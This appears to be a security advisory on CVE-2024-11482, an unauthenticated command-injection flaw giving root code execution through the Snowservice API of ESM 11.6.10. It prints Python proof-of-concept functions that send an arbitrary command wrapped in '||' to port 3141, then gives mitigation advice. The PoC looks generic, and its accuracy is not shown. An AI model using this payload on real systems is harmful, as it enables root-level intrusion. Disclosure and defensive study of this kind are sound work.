Cybersecurity researchers have recently discovered a critical vulnerability in ESM (Enterprise Security Manager) version 11.6.10. This vulnerability, assigned the ID CVE-2024-11482, allows unauthenticated users to access the internal Snowservice API and execute remote code through command injection as the root user. The severity of this vulnerability raises serious security concerns for organizations using ESM 11.6.10.
Vulnerability Details
The vulnerability exists in the Snowservice component of the ESM 11.6.10. Snowservice is a critical part of the ESM infrastructure responsible for providing various services, including inventory management, patch management, license management, and software distribution.
Upon analyzing the Snowservice binary, the researchers found that it listens on TCP port 3141, which is available to external connections without any authentication mechanisms in place. This security oversight allows an attacker to access the API without any credentials, potentially running malicious commands with root user privileges.
Furthermore, the Snowservice component parses incoming commands without proper input validation and sanitation. This lack of input validation allows an attacker to inject arbitrary commands into the system, leading to remote code execution (RCE) as the root user, granting full control over the target system.
Exploit Details
The researchers have provided a Python-based Proof-of-Concept (PoC) exploit to demonstrate the vulnerability. The exploit has two components: the first part is a script that accesses the Snowservice API, while the second part is a script that submits a crafted command to the API for execution.
Script to access Snowservice API
import requests
def access_snowservice_api(target_ip):
url = f"http://{target_ip}:3141/api/";
try:
response = requests.get(url)
if response.status_code == 200:
return response.text
else:
return None
except requests.exceptions.RequestException:
return None
Script to submit a crafted command for RCE
import requests
def execute_remote_code(target_ip, command):
url = f"http://{target_ip}:3141/api/";
headers = {
"Content-Type": "application/json"
}
payload = {
"command": f"||{command}||"
}
try:
response = requests.post(url, headers=headers, json=payload)
if response.status_code == 200:
return response.text
else:
return None
except requests.exceptions.RequestException:
return None
Please note that the above exploit code should be used for educational and security testing purposes only.
For more information on CVE-2024-11482, you can visit the following links
- CVE-2024-11482 - Exploit Database
- National Vulnerability Database (NVD) - CVE-2024-11482
- Mitre CVE - CVE-2024-11482
Recommendations
Organizations using ESM 11.6.10 should take immediate steps to mitigate the risk associated with this vulnerability. It is recommended to implement proper authentication mechanisms for the Snowservice API and ensure rigorous input validation for all incoming commands. Additionally, users should consider upgrading ESM to a more secure version or to a corresponding patch from the vendor, if available.
Conclusion
CVE-2024-11482 poses a significant risk to organizations using ESM 11.6.10 as it grants unauthenticated access to the internal Snowservice API and enables remote root-level code execution. It is critical for affected parties to take necessary steps to address this vulnerability and maintain the security and integrity of their systems.
Timeline
Published on: 11/29/2024 08:15:04 UTC